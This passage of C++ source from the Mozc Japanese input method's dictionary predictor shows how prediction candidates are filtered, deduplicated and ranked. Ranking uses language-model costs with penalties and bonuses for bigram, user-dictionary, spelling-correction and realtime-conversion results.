candidate->value = value;
candidate->lid = result.lid;
candidate->rid = result.rid;
candidate->wcost = result.wcost;
candidate->cost = result.cost;
candidate->attributes = result.candidate_attributes;
if ((!(candidate->attributes & Segment::Candidate::SPELLING_CORRECTION) &&
IsLatinInputMode(request)) ||
(result.types & SUFFIX)) {
candidate->attributes |= Segment::Candidate::NO_VARIANTS_EXPANSION;
candidate->attributes |= Segment::Candidate::NO_EXTRA_DESCRIPTION;
}
if (candidate->attributes & Segment::Candidate::PARTIALLY_KEY_CONSUMED) {
candidate->consumed_key_size = result.consumed_key_size;
// There are two scenarios to reach here.
// 1. Auto partial suggestion.
// e.g. composition わたしのなまえ| -> candidate 私の
// 2. Partial suggestion.
// e.g. composition わたしの|なまえ -> candidate 私の
// To distinguish auto partial suggestion from (non-auto) partial
// suggestion, see the cursor position. If the cursor is at the tail
// of the composition, this is auto partial suggestion.
if (cursor_at_tail) {
candidate->attributes |= Segment::Candidate::AUTO_PARTIAL_SUGGESTION;
}
}
candidate->source_info = result.source_info;
if (result.types & REALTIME) {
candidate->inner_segment_boundary = result.inner_segment_boundary;
}
if (result.types & TYPING_CORRECTION) {
candidate->attributes |= Segment::Candidate::TYPING_CORRECTION;
}
SetDescription(result.types, candidate->attributes,
&candidate->description);
if (is_debug) {
SetDebugDescription(merged_types[result.value], &candidate->description);
}
#ifdef MOZC_DEBUG
candidate->log += "\n" + result.log;
#endif // MOZC_DEBUG
};
#ifdef MOZC_DEBUG
auto add_debug_candidate = [&](Result result, const std::string &log) {
std::string key, value;
if (result.types & BIGRAM) {
// remove the prefix of history key and history value.
key = result.key.substr(history_key.size(),
result.key.size() - history_key.size());
value = result.value.substr(history_value.size(),
result.value.size() - history_value.size());
} else {
key = result.key;
value = result.value;
}
result.log.append(log);
Segment::Candidate candidate;
add_candidate(result, key, value, &candidate);
segment->removed_candidates_for_debug_.push_back(std::move(candidate));
};
#define MOZC_ADD_DEBUG_CANDIDATE(result, log) \
add_debug_candidate(result, MOZC_WORD_LOG_MESSAGE(log))
#else // MOZC_DEBUG
#define MOZC_ADD_DEBUG_CANDIDATE(result, log) \
{}
#endif // MOZC_DEBUG
for (size_t i = 0; i < results->size(); ++i) {
// Pop a result from a heap. Please pay attention not to use results->at(i).
std::pop_heap(results->begin(), results->end() - i, ResultCostLess());
const Result &result = results->at(results->size() - i - 1);
if (added >= size || result.cost >= kInfinity) {
break;
}
if (result.removed) {
MOZC_ADD_DEBUG_CANDIDATE(result, "Removed flag is on");
continue;
}
// When |include_exact_key| is true, we don't filter the results
// which have the exactly same key as the input even if it's a bad
// suggestion.
if (!(include_exact_key && (result.key == input_key)) &&
suggestion_filter_->IsBadSuggestion(result.value)) {
MOZC_ADD_DEBUG_CANDIDATE(result, "Bad suggestion");
continue;
}
    // Don't suggest exactly the same candidate as key.
    // If |include_exact_key| is true, this filter is not applied.
if (!include_exact_key && !(result.types & REALTIME) &&
(((result.types & BIGRAM) && exact_bigram_key == result.value) ||
(!(result.types & BIGRAM) && input_key == result.value))) {
MOZC_ADD_DEBUG_CANDIDATE(result, "Key == candidate");
continue;
}
std::string key, value;
if (result.types & BIGRAM) {
// remove the prefix of history key and history value.
key = result.key.substr(history_key.size(),
result.key.size() - history_key.size());
value = result.value.substr(history_value.size(),
result.value.size() - history_value.size());
} else {
key = result.key;
value = result.value;
}
if (!seen.insert(value).second) {
MOZC_ADD_DEBUG_CANDIDATE(result, "Duplicated");
continue;
}
// User input: "おーすとり" (len = 5)
    // key/value: "おーすとりら" "オーストラリア" (mismatch pos = 4)
if ((result.candidate_attributes &
Segment::Candidate::SPELLING_CORRECTION) &&
key != input_key &&
input_key_len <= GetMissSpelledPosition(key, value) + 1) {
MOZC_ADD_DEBUG_CANDIDATE(result, "Spelling correction");
continue;
}
if (result.types == SUFFIX && added_suffix++ >= 20) {
      // TODO(toshiyuki): Need refactoring for controlling the number of suffix
      // predictions after we fix the appropriate number.
MOZC_ADD_DEBUG_CANDIDATE(result, "Added suffix >= 20");
continue;
}
Segment::Candidate *candidate = segment->push_back_candidate();
add_candidate(result, key, value, candidate);
++added;
}
return added > 0;
#undef MOZC_ADD_DEBUG_CANDIDATE
}
DictionaryPredictor::PredictionTypes
DictionaryPredictor::AggregatePredictionForZeroQuery(
const ConversionRequest &request, Segments *segments,
std::vector<Result> *results) const {
DCHECK(segments);
DCHECK(results);
if (!request.request().zero_query_suggestion()) {
// Zero query is disabled by request.
return NO_PREDICTION;
}
PredictionTypes selected_types = NO_PREDICTION;
constexpr int kMinHistoryKeyLenForZeroQuery = 2;
if (HasHistoryKeyLongerThanOrEqualTo(*segments,
kMinHistoryKeyLenForZeroQuery)) {
AggregateBigramPrediction(
request, *segments,
Segment::Candidate::DICTIONARY_PREDICTOR_ZERO_QUERY_BIGRAM, results);
selected_types |= BIGRAM;
}
if (segments->history_segments_size() > 0) {
AggregateZeroQuerySuffixPrediction(request, *segments, results);
selected_types |= SUFFIX;
}
return selected_types;
}
DictionaryPredictor::PredictionType
DictionaryPredictor::AggregateUnigramCandidateForLatinInput(
const ConversionRequest &request, const Segments &segments,
std::vector<Result> *results) const {
AggregateEnglishPrediction(request, segments, results);
return ENGLISH;
}
void DictionaryPredictor::SetDescription(PredictionTypes types,
uint32_t attributes,
std::string *description) {
if (types & TYPING_CORRECTION) {
Util::AppendStringWithDelimiter(" ", "補正", description);
}
if (attributes & Segment::Candidate::AUTO_PARTIAL_SUGGESTION) {
Util::AppendStringWithDelimiter(" ", "部分", description);
}
}
void DictionaryPredictor::SetDebugDescription(PredictionTypes types,
std::string *description) {
std::string debug_desc;
if (types & UNIGRAM) {
debug_desc.append(1, 'U');
}
if (types & BIGRAM) {
debug_desc.append(1, 'B');
}
if (types & REALTIME_TOP) {
debug_desc.append("R1");
} else if (types & REALTIME) {
debug_desc.append(1, 'R');
}
if (types & SUFFIX) {
debug_desc.append(1, 'S');
}
if (types & ENGLISH) {
debug_desc.append(1, 'E');
}
// Note that description for TYPING_CORRECTION is omitted
// because it is appended by SetDescription.
if (!debug_desc.empty()) {
Util::AppendStringWithDelimiter(" ", debug_desc, description);
}
}
// Returns cost for |result| when it's transitioned from |rid|. Suffix penalty
// is also added for non-realtime results.
int DictionaryPredictor::GetLMCost(const Result &result, int rid) const {
const int cost_with_context = connector_->GetTransitionCost(rid, result.lid);
int lm_cost = 0;
if (result.types & SUFFIX) {
// We always respect the previous context to calculate the cost of SUFFIX.
// Otherwise, the suffix that doesn't match the context will be promoted.
lm_cost = cost_with_context + result.wcost;
} else {
// Sometimes transition cost is too high and causes a bug like b/18112966.
// For example, "接続詞 が" -> "始まる 動詞,五段活用,基本形" has very large
// cost and "始まる" is demoted. To prevent such cases, ImmutableConverter
// computes transition from BOS/EOS too; see
// ImmutableConverterImpl::MakeLatticeNodesForHistorySegments().
    // Here, taking the minimum of |cost_with_context| and
    // |cost_without_context| has a similar effect.
const int cost_without_context =
connector_->GetTransitionCost(0, result.lid);
lm_cost = std::min(cost_with_context, cost_without_context) + result.wcost;
}
if (!(result.types & REALTIME)) {
    // Realtime conversion already adds prefix/suffix penalties to the result.
    // Note that we don't add the prefix penalty here because the role of
    // "bunsetsu" is ambiguous on zero-query suggestion.
lm_cost += segmenter_->GetSuffixPenalty(result.rid);
}
return lm_cost;
}
namespace {
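// Callback that scans a dictionary traversal for a token whose value exactly
// matches |target_value| and remembers the first matching token.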
class FindValueCallback : public DictionaryInterface::Callback {
public:
explicit FindValueCallback(absl::string_view target_value)
: target_value_(target_value), found_(false) {}
ResultType OnToken(absl::string_view, // key
absl::string_view, // actual_key
const Token &token) override {
if (token.value != target_value_) {
return TRAVERSE_CONTINUE;
}
found_ = true;
token_ = token;
return TRAVERSE_DONE;
}
bool found() const { return found_; }
const Token &token() const { return token_; }
private:
absl::string_view target_value_;
bool found_;
Token token_;
DISALLOW_COPY_AND_ASSIGN(FindValueCallback);
};
} // namespace
void DictionaryPredictor::Result::InitializeByTokenAndTypes(
    const Token &token, PredictionTypes types) {
  SetTypesAndTokenAttributes(types, token.attributes);
  key = token.key;
  value = token.value;
  wcost = token.cost;
  lid = token.lid;
  rid = token.rid;
}
void DictionaryPredictor::Result::SetTypesAndTokenAttributes(
PredictionTypes prediction_types, Token::AttributesBitfield token_attr) {
types = prediction_types;
candidate_attributes = 0;
if (types & TYPING_CORRECTION) {
candidate_attributes |= Segment::Candidate::TYPING_CORRECTION;
}
if (types & (REALTIME | REALTIME_TOP)) {
candidate_attributes |= Segment::Candidate::REALTIME_CONVERSION;
}
if (token_attr & Token::SPELLING_CORRECTION) {
candidate_attributes |= Segment::Candidate::SPELLING_CORRECTION;
}
if (token_attr & Token::USER_DICTIONARY) {
candidate_attributes |= (Segment::Candidate::USER_DICTIONARY |
Segment::Candidate::NO_VARIANTS_EXPANSION);
}
}
void DictionaryPredictor::Result::SetSourceInfoForZeroQuery(
ZeroQueryType type) {
switch (type) {
case ZERO_QUERY_NONE:
source_info |= Segment::Candidate::DICTIONARY_PREDICTOR_ZERO_QUERY_NONE;
return;
case ZERO_QUERY_NUMBER_SUFFIX:
source_info |=
Segment::Candidate::DICTIONARY_PREDICTOR_ZERO_QUERY_NUMBER_SUFFIX;
return;
case ZERO_QUERY_EMOTICON:
source_info |=
Segment::Candidate::DICTIONARY_PREDICTOR_ZERO_QUERY_EMOTICON;
return;
case ZERO_QUERY_EMOJI:
source_info |= Segment::Candidate::DICTIONARY_PREDICTOR_ZERO_QUERY_EMOJI;
return;
case ZERO_QUERY_BIGRAM:
source_info |= Segment::Candidate::DICTIONARY_PREDICTOR_ZERO_QUERY_BIGRAM;
return;
case ZERO_QUERY_SUFFIX:
source_info |= Segment::Candidate::DICTIONARY_PREDICTOR_ZERO_QUERY_SUFFIX;
return;
default:
LOG(ERROR) << "Should not come here";
return;
}
}
bool DictionaryPredictor::Result::IsUserDictionaryResult() const {
return (candidate_attributes & Segment::Candidate::USER_DICTIONARY) != 0;
}
// Here, we treat the word as English when its key consists of Latin
// characters.
bool DictionaryPredictor::Result::IsEnglishEntryResult() const {
return Util::IsEnglishTransliteration(key);
}
bool DictionaryPredictor::GetHistoryKeyAndValue(const Segments &segments,
std::string *key,
std::string *value) const {
DCHECK(key);
DCHECK(value);
if (segments.history_segments_size() == 0) {
return false;
}
const Segment &history_segment =
segments.history_segment(segments.history_segments_size() - 1);
if (history_segment.candidates_size() == 0) {
return false;
}
key->assign(history_segment.candidate(0).key);
value->assign(history_segment.candidate(0).value);
return true;
}
void DictionaryPredictor::SetPredictionCost(
const Segments &segments, std::vector<Result> *results) const {
DCHECK(results);
int rid = 0; // 0 (BOS) is default
if (segments.history_segments_size() > 0) {
const Segment &history_segment =
segments.history_segment(segments.history_segments_size() - 1);
if (history_segment.candidates_size() > 0) {
rid = history_segment.candidate(0).rid; // use history segment's id
}
}
const std::string &input_key = segments.conversion_segment(0).key();
std::string history_key, history_value;
GetHistoryKeyAndValue(segments, &history_key, &history_value);
const std::string bigram_key = history_key + input_key;
const bool is_suggestion = (segments.request_type() == Segments::SUGGESTION);
  // Use the same scoring function for both unigram and bigram.
  // Bigram will be boosted because we pass the previous
  // key as context information.
const size_t bigram_key_len = Util::CharsLen(bigram_key);
const size_t unigram_key_len = Util::CharsLen(input_key);
// In the loop below, we track the minimum cost among those REALTIME
// candidates that have the same key length as |input_key| so that we can set
// a slightly smaller cost to REALTIME_TOP than these.
int realtime_cost_min = kInfinity;
Result *realtime_top_result = nullptr;
for (size_t i = 0; i < results->size(); ++i) {
const Result &result = results->at(i);
// The cost of REALTIME_TOP is determined after the loop based on the
// minimum cost for REALTIME. Just remember the pointer of result.
if (result.types & REALTIME_TOP) {
realtime_top_result = &results->at(i);
continue;
}
const int cost = GetLMCost(result, rid);
const size_t query_len =
(result.types & BIGRAM) ? bigram_key_len : unigram_key_len;
const size_t key_len = Util::CharsLen(result.key);
if (IsAggressiveSuggestion(query_len, key_len, cost, is_suggestion,
results->size())) {
results->at(i).cost = kInfinity;
continue;
}
// cost = -500 * log(lang_prob(w) * (1 + remain_length)) -- (1)
// where lang_prob(w) is a language model probability of the word "w", and
// remain_length the length of key user must type to input "w".
//
// Example:
// key/value = "とうきょう/東京"
// user_input = "とう"
// remain_length = len("とうきょう") - len("とう") = 3
//
// By taking the log of (1),
    //   cost = -500 * [log(lang_prob(w)) + log(1 + remain_length)]
    //        = -500 * log(lang_prob(w)) - 500 * log(1 + remain_length)
    //        = cost - 500 * log(1 + remain_length)
    // because cost = -500 * log(lang_prob(w)).
//
    // lang_prob(w) * (1 + remain_length) represents how much the user can
    // reduce the total typing by choosing this candidate.
    // Before this simple algorithm, we had been using an SVM-based scoring,
    // but we stopped using it for the following reasons.
    // 1) Hard to maintain the ranking.
    // 2) Hard to control the final results of SVM.
    // 3) Hard to debug.
    // 4) Since we used log(remain_length) as a feature,
    //    the new ranking algorithm and the SVM algorithm were essentially
    //    the same.
    // 5) Since we used the length of value as a feature, we found
// inconsistencies between the conversion and the prediction
// -- the results of top prediction and the top conversion
// (the candidate shown after the space key) may differ.
//
    // The new function brings consistent results. If two candidates
    // have the same reading (key), they should have the same cost bonus
    // from the length part. This implies that the result is reranked by
    // the language model probability as long as the key part is the same.
    // This behavior is basically the same as the converter.
    //
    // TODO(team): want to find the best parameter instead of kCostFactor.
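    //
    // For illustration (hypothetical numbers): if -500 * log(lang_prob(w)) is
    // 4000 and key_len - query_len is 3, the adjusted cost below becomes
    // 4000 - 500 * ln(4) ~= 3307, i.e. longer completions get a small boost.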
constexpr int kCostFactor = 500;
results->at(i).cost =
cost - kCostFactor * log(1.0 + std::max<int>(0, key_len - query_len));
// Update the minimum cost for REALTIME candidates that have the same key
// length as input_key.
if (result.types & REALTIME && result.cost < realtime_cost_min &&
result.key.size() == input_key.size()) {
realtime_cost_min = result.cost;
}
}
// Ensure that the REALTIME_TOP candidate has relatively smaller cost than
// those of REALTIME candidates.
if (realtime_top_result != nullptr) {
realtime_top_result->cost = std::max(0, realtime_cost_min - 10);
}
}
void DictionaryPredictor::SetPredictionCostForMixedConversion(
const Segments &segments, std::vector<Result> *results) const {
DCHECK(results);
// ranking for mobile
int rid = 0; // 0 (BOS) is default
int prev_cost = 0; // cost of the last history candidate.
if (segments.history_segments_size() > 0) {
const Segment &history_segment =
segments.history_segment(segments.history_segments_size() - 1);
if (history_segment.candidates_size() > 0) {
rid = history_segment.candidate(0).rid; // use history segment's id
prev_cost = history_segment.candidate(0).cost;
if (prev_cost == 0) {
// if prev_cost is set to be 0 for some reason, use default cost.
prev_cost = 5000;
}
}
}
const size_t input_key_len =
Util::CharsLen(segments.conversion_segment(0).key());
for (Result &result : *results) {
int cost = GetLMCost(result, rid);
MOZC_WORD_LOG(result, absl::StrCat("GetLMCost: ", cost));
    // Demote filtered words here, because they are not filtered for exact
    // matches.
// Even for exact match, we don't want to show aggressive words with high
// ranking.
if (suggestion_filter_->IsBadSuggestion(result.value)) {
      // Cost penalty for bad suggestions.
// 3453 = 500 * log(1000)
constexpr int kBadSuggestionPenalty = 3453;
cost += kBadSuggestionPenalty;
MOZC_WORD_LOG(result, absl::StrCat("BadSuggestionPenalty: ", cost));
}
    // Make exact candidates have higher ranking.
    // For mobile, suggestion is the main source of candidates and users
    // expect candidates that match the input key.
if (result.types & (UNIGRAM | TYPING_CORRECTION)) {
const size_t key_len = Util::CharsLen(result.key);
if (key_len > input_key_len) {
        // Cost penalty such that exact candidates are evaluated as
        // 50 times more frequent.
// Note that the cost is calculated by cost = -500 * log(prob)
// 1956 = 500 * log(50)
constexpr int kNotExactPenalty = 1956;
cost += kNotExactPenalty;
MOZC_WORD_LOG(result,
absl::StrCat("Unigram | Typing correction: ", cost));
}
}
if (result.types & BIGRAM) {
// When user inputs "六本木" and there is an entry
// "六本木ヒルズ" in the dictionary, we can suggest
// "ヒルズ" as a ZeroQuery suggestion. In this case,
      // We can't calculate the transition cost between "六本木"
      // and "ヒルズ". If we ignore the transition cost,
      // bigram-based suggestion will be overestimated.
      // Here we use kDefaultTransitionCost as a
      // transition cost between "六本木" and "ヒルズ". Currently,
// the cost is basically the same as the cost between
// "名詞,一般" and "名詞,一般".
// TODO(taku): Adjust these parameters.
// Seems the bigram is overestimated.
constexpr int kDefaultTransitionCost = 1347;
// Promoting bigram candidates.
constexpr int kBigramBonus = 800; // ~= 500*ln(5)
cost += (kDefaultTransitionCost - kBigramBonus - prev_cost);
MOZC_WORD_LOG(result, absl::StrCat("Bigram: ", cost));
}
if (result.candidate_attributes & Segment::Candidate::USER_DICTIONARY &&
result.lid != general_symbol_id_) {
      // Decrease the cost for words from the user dictionary in order to
      // promote them, provided that the word is not a general symbol
      // (Note: emoticons are mapped to general symbols). Currently user
      // dictionary words are evaluated as 5 times more frequent, with the cost
      // capped at 1000 (this number is ad hoc, so feel free to adjust).
constexpr int kUserDictionaryPromotionFactor = 804; // 804 = 500 * log(5)
constexpr int kUserDictionaryCostUpperLimit = 1000;
cost = std::min(cost - kUserDictionaryPromotionFactor,
kUserDictionaryCostUpperLimit);
MOZC_WORD_LOG(result, absl::StrCat("User dictionary: ", cost));
}
// Note that the cost is defined as -500 * log(prob).
// Even after the ad hoc manipulations, cost must remain larger than 0.
result.cost = std::max(1, cost);
MOZC_WORD_LOG(result, absl::StrCat("SetLMCost: ", result.cost));
}
}
// This method should be deprecated, as it unintentionally adds an extra
// spatial penalty to the candidate.
void DictionaryPredictor::ApplyPenaltyForKeyExpansion(
const Segments &segments, std::vector<Result> *results) const {
if (segments.conversion_segments_size() == 0) {
return;
}
  // Cost penalty 1151 means that expanded candidates are evaluated as
  // 10 times less frequent.
  // Note that the cost is calculated by cost = -500 * log(prob)
// 1151 = 500 * log(10)
constexpr int kKeyExpansionPenalty = 1151;
const std::string &conversion_key = segments.conversion_segment(0).key();
for (size_t i = 0; i < results->size(); ++i) {
Result &result = results->at(i);
if (result.types & TYPING_CORRECTION) {
continue;
}
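    // A key that does not start with |conversion_key| does not match the raw
    // composition, so it was produced through key expansion; demote it.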
if (!absl::StartsWith(result.key, conversion_key)) {
result.cost += kKeyExpansionPenalty;
MOZC_WORD_LOG(result, absl::StrCat("KeyExpansionPenalty: ", result.cost));
}
}
}
size_t DictionaryPredictor::GetMissSpelledPosition(
const std::string &key, const std::string &value) const {
std::string hiragana_value;
japanese_util::KatakanaToHiragana(value, &hiragana_value);
  // The value is of mixed script type; in this case just return the length of
  // key (i.e., no mismatch position within the key).
if (Util::GetScriptType(hiragana_value) != Util::HIRAGANA) {
return Util::CharsLen(key);
}
  // Find the position of the first character where the misspelling occurs.
int position = 0;
ConstChar32Iterator key_iter(key);
for (ConstChar32Iterator hiragana_iter(hiragana_value);
!hiragana_iter.Done() && !key_iter.Done();
hiragana_iter.Next(), key_iter.Next(), ++position) {
if (hiragana_iter.Get() != key_iter.Get()) {
return position;
}
}
  // No mismatch was found. Return the length of key.
while (!key_iter.Done()) {
++position;
key_iter.Next();
}
return position;
}
void DictionaryPredictor::RemoveMissSpelledCandidates(
size_t request_key_len, std::vector<Result> *results) const {
DCHECK(results);
if (results->size() <= 1) {
return;
}
int spelling_correction_size = 5;
for (size_t i = 0; i < results->size(); ++i) {
const Result &result = (*results)[i];
if (!(result.candidate_attributes &
Segment::Candidate::SPELLING_CORRECTION)) {
continue;
}
    // Check at most 5 spelling corrections to avoid the case where
    // all candidates have SPELLING_CORRECTION.
if (--spelling_correction_size == 0) {
return;
}
std::vector<size_t> same_key_index, same_value_index;
for (size_t j = 0; j < results->size(); ++j) {
if (i == j) {
continue;
}
const Result &target_result = (*results)[j];
if (target_result.candidate_attributes &
Segment::Candidate::SPELLING_CORRECTION) {
continue;
}
if (target_result.key == result.key) {
same_key_index.push_back(j);
}
if (target_result.value == result.value) {
same_value_index.push_back(j);
}
}
// delete same_key_index and same_value_index
if (!same_key_index.empty() && !same_value_index.empty()) {
results->at(i).removed = true;
MOZC_WORD_LOG(results->at(i), "Removed. same_(key|value)_index.");
for (size_t k = 0; k < same_key_index.size(); ++k) {
results->at(same_key_index[k]).removed = true;
MOZC_WORD_LOG(results->at(i), "Removed. same_(key|value)_index.");
}
} else if (same_key_index.empty() && !same_value_index.empty()) {
results->at(i).removed = true;
MOZC_WORD_LOG(results->at(i), "Removed. same_value_index.");
} else if (!same_key_index.empty() && same_value_index.empty()) {
for (size_t k = 0; k < same_key_index.size(); ++k) {
results->at(same_key_index[k]).removed = true;
MOZC_WORD_LOG(results->at(i), "Removed. same_key_index.");
}
if (request_key_len <= GetMissSpelledPosition(result.key, result.value)) {
results->at(i).removed = true;
MOZC_WORD_LOG(results->at(i), "Removed. Invalid MissSpelledPosition.");
}
}
}
}
bool DictionaryPredictor::IsAggressiveSuggestion(
size_t query_len, size_t key_len, int cost, bool is_suggestion,
size_t total_candidates_size) const {
  // Temporary workaround for fixing the problem where longer sentence-like
  // suggestions are shown when user input is very short.
// "ただしい" => "ただしいけめんにかぎる"
// "それでもぼ" => "それでもぼくはやっていない".
// If total_candidates_size is small enough, we don't perform
// special filtering. e.g., "せんとち" has only two candidates, so
// showing "千と千尋の神隠し" is OK.
  // Also, if the cost is too small (< 5000), we allow displaying
  // long phrases. Examples include "よろしくおねがいします".
if (is_suggestion && total_candidates_size >= 10 && key_len >= 8 &&
cost >= 5000 && query_len <= static_cast<size_t>(0.4 * key_len)) {
return true;
}
return false;
}
size_t DictionaryPredictor::GetRealtimeCandidateMaxSize(
const ConversionRequest &request, const Segments &segments,
bool mixed_conversion) const {
const Segments::RequestType request_type = segments.request_type();
DCHECK(request_type == Segments::PREDICTION ||
request_type == Segments::SUGGESTION ||
request_type == Segments::PARTIAL_PREDICTION ||
request_type == Segments::PARTIAL_SUGGESTION);
if (segments.conversion_segments_size() == 0) {
return 0;
}
const bool is_long_key = IsLongKeyForRealtimeCandidates(segments);
const size_t max_size =
GetMaxSizeForRealtimeCandidates(request, segments, is_long_key);
const size_t default_size = GetDefaultSizeForRealtimeCandidates(is_long_key);
size_t size = 0;
switch (request_type) {
case Segments::PREDICTION:
size = mixed_conversion ? max_size : default_size;
break;
case Segments::SUGGESTION:
      // Fewer candidates are basically needed.
      // But in mixed_conversion mode we should behave as in conversion mode.
size = mixed_conversion ? default_size : 1;
break;
case Segments::PARTIAL_PREDICTION:
      // This is a kind of prediction, so richer results than
      // PARTIAL_SUGGESTION are needed.
size = max_size;
break;
case Segments::PARTIAL_SUGGESTION:
      // PARTIAL_SUGGESTION works like conversion mode, so returning
      // some candidates is needed.
size = default_size;
break;
default:
size = 0; // Never reach here
}
return std::min(max_size, size);
}
bool DictionaryPredictor::PushBackTopConversionResult(
const ConversionRequest &request, const Segments &segments,
std::vector<Result> *results) const {
DCHECK_EQ(1, segments.conversion_segments_size());
Segments tmp_segments = segments;
ConversionRequest tmp_request = request;
tmp_request.set_max_conversion_candidates_size(20);
tmp_request.set_composer_key_selection(ConversionRequest::PREDICTION_KEY);
// Some rewriters cause significant performance loss. So we skip them.
tmp_request.set_skip_slow_rewriters(true);
  // This method emulates the usual converter's behavior, so disable
  // partial candidates here.
tmp_request.set_create_partial_candidates(false);
if (!converter_->StartConversionForRequest(tmp_request, &tmp_segments)) {
return false;
}
results->push_back(Result());
Result *result = &results->back();
result->key = segments.conversion_segment(0).key();
result->lid = tmp_segments.conversion_segment(0).candidate(0).lid;
result->rid =
tmp_segments
.conversion_segment(tmp_segments.conversion_segments_size() - 1)
.candidate(0)
.rid;
result->SetTypesAndTokenAttributes(REALTIME | REALTIME_TOP, Token::NONE);
result->candidate_attributes |= Segment::Candidate::NO_VARIANTS_EXPANSION;
// Concatenate the top candidates.
// Note that since StartConversionForRequest() runs in conversion mode, the
// resulting |tmp_segments| doesn't have inner_segment_boundary. We need to
// construct it manually here.
  // TODO(noriyukit): This is duplicated code from converter/nbest_generator.cc;
  // we should refactor it after finding a better design.
bool inner_segment_boundary_success = true;
for (size_t i = 0; i < tmp_segments.conversion_segments_size(); ++i) {
const Segment &segment = tmp_segments.conversion_segment(i);
const Segment::Candidate &candidate = segment.candidate(0);
result->value.append(candidate.value);
result->wcost += candidate.cost;
uint32_t encoded_lengths;
if (inner_segment_boundary_success &&
Segment::Candidate::EncodeLengths(
candidate.key.size(), candidate.value.size(),
candidate.content_key.size(), candidate.content_value.size(),
&encoded_lengths)) {
result->inner_segment_boundary.push_back(encoded_lengths);
} else {
inner_segment_boundary_success = false;
}
}
if (!inner_segment_boundary_success) {
LOG(WARNING) << "Failed to construct inner segment boundary";
result->inner_segment_boundary.clear();
}
return true;
}
void DictionaryPredictor::AggregateRealtimeConversion(
const ConversionRequest &request, size_t realtime_candidates_size,
Segments *segments, std::vector<Result> *results) const {
DCHECK(converter_);
DCHECK(immutable_converter_);
DCHECK(segments);
DCHECK(results);
// TODO(noriyukit): Currently, |segments| is abused as a temporary output from
// the immutable converter. Therefore, the first segment needs to be mutable.
// Fix this bad abuse.
Segment *segment = segments->mutable_conversion_segment(0);
DCHECK(!segment->key().empty());
// First insert a top conversion result.
if (request.use_actual_converter_for_realtime_conversion()) {
if (!PushBackTopConversionResult(request, *segments, results)) {
LOG(WARNING) << "Realtime conversion with converter failed";
}
}
if (realtime_candidates_size == 0) {
return;
}
// In what follows, add results from immutable converter.
// TODO(noriyukit): The |immutable_converter_| used below can be replaced by
// |converter_| in principle. There's a problem of ranking when we get
// multiple segments, i.e., how to concatenate candidates in each segment.
// Currently, immutable converter handles such ranking in prediction mode to
// generate single segment results. So we want to share that code.
// Preserve the current candidates_size to restore segments at the end of this
// method.
const size_t prev_candidates_size = segment->candidates_size();
const ConversionRequest request_for_realtime =
GetConversionRequestForRealtimeCandidates(
request, realtime_candidates_size, prev_candidates_size);
if (!immutable_converter_->ConvertForRequest(request_for_realtime,
segments) ||
prev_candidates_size >= segment->candidates_size()) {
LOG(WARNING) << "Convert failed";
return;
}
// A little tricky treatment:
// Since ImmutableConverter::Convert creates a set of new candidates,
// copy them into the array of Results.
for (size_t i = prev_candidates_size; i < segment->candidates_size(); ++i) {
const Segment::Candidate &candidate = segment->candidate(i);
results->push_back(Result());
Result *result = &results->back();
result->key = candidate.key;
result->value = candidate.value;
result->wcost = candidate.wcost;
result->lid = candidate.lid;
result->rid = candidate.rid;
result->inner_segment_boundary = candidate.inner_segment_boundary;
result->SetTypesAndTokenAttributes(REALTIME, Token::NONE);
result->candidate_attributes |= candidate.attributes;
result->consumed_key_size = candidate.consumed_key_size;
}
// Remove candidates created by ImmutableConverter.
segment->erase_candidates(prev_candidates_size,
segment->candidates_size() - prev_candidates_size);
}
size_t DictionaryPredictor::GetCandidateCutoffThreshold(
const Segments &segments) const {
DCHECK(segments.request_type() == Segments::PREDICTION ||
segments.request_type() == Segments::SUGGESTION);
if (segments.request_type() == Segments::PREDICTION) {
    // For PREDICTION, more candidates are needed than for SUGGESTION.
return kPredictionMaxResultsSize;
}
return kSuggestionMaxResultsSize;
}
DictionaryPredictor::PredictionType
DictionaryPredictor::AggregateUnigramCandidate(
const ConversionRequest &request, const Segments &segments,
std::vector<Result> *results) const {
DCHECK(results);
DCHECK(dictionary_);
DCHECK(segments.request_type() == Segments::PREDICTION ||
segments.request_type() == Segments::SUGGESTION);
const size_t cutoff_threshold = GetCandidateCutoffThreshold(segments);
const size_t prev_results_size = results->size();
GetPredictiveResults(*dictionary_, "", request, segments, UNIGRAM,
cutoff_threshold, Segment::Candidate::SOURCE_INFO_NONE,
unknown_id_, results);
const size_t unigram_results_size = results->size() - prev_results_size;
  // If the size reaches max_results_size (== cutoff_threshold),
  // we don't show the candidates, since disambiguation from
  // 256 candidates is hard. (It may exceed max_results_size, because this is
  // just a limit for each backend, so the total number may be larger.)
if (unigram_results_size >= cutoff_threshold) {
results->resize(prev_results_size);
}
return UNIGRAM;
}
DictionaryPredictor::PredictionType
DictionaryPredictor::AggregateUnigramCandidateForMixedConversion(
const ConversionRequest &request, const Segments &segments,
std::vector<Result> *results) const {
DCHECK(segments.request_type() == Segments::PREDICTION ||
segments.request_type() == Segments::SUGGESTION);
AggregateUnigramCandidateForMixedConversion(*dictionary_, request, segments,
unknown_id_, results);
return UNIGRAM;
}
void DictionaryPredictor::AggregateUnigramCandidateForMixedConversion(
const dictionary::DictionaryInterface &dictionary,
const ConversionRequest &request, const Segments &segments, int unknown_id,
std::vector<Result> *results) {
const size_t cutoff_threshold = kPredictionMaxResultsSize;
std::vector<Result> raw_result;
// No history key
GetPredictiveResults(dictionary, "", request, segments, UNIGRAM,
cutoff_threshold, Segment::Candidate::SOURCE_INFO_NONE,
unknown_id, &raw_result);
// Hereafter, we split "Needed Results" and "(maybe) Unneeded Results."
// The algorithm is:
// 1) Take the Result with minimum cost.
  // 2) Remove results which are "redundant" (defined by MaybeRedundant),
// from remaining results.
// 3) Repeat 1) and 2) five times.
// Note: to reduce the number of memory allocation, we swap out the
// "redundant" results to the end of the |results| vector.
constexpr size_t kDeleteTrialNum = 5;
// min_iter is the beginning of the remaining results (inclusive), and
// max_iter is the end of the remaining results (exclusive).
typedef std::vector<Result>::iterator Iter;
Iter min_iter = raw_result.begin();
Iter max_iter = raw_result.end();
for (size_t i = 0; i < kDeleteTrialNum; ++i) {
if (min_iter == max_iter) {
break;
}
// Find the Result with minimum cost. Swap it with the beginning element.
std::iter_swap(min_iter,
std::min_element(min_iter, max_iter, ResultWCostLess()));
const Result &reference_result = *min_iter;
// Preserve the reference result.
++min_iter;
// Traverse all remaining elements and check if each result is redundant.
for (Iter iter = min_iter; iter != max_iter;) {
// - We do not filter user dictionary word.
const bool should_check_redundant = !iter->IsUserDictionaryResult();
if (should_check_redundant &&
MaybeRedundant(reference_result.value, iter->value)) {
// Swap out the redundant result.
--max_iter;
std::iter_swap(iter, max_iter);
} else {
++iter;
}
}
}
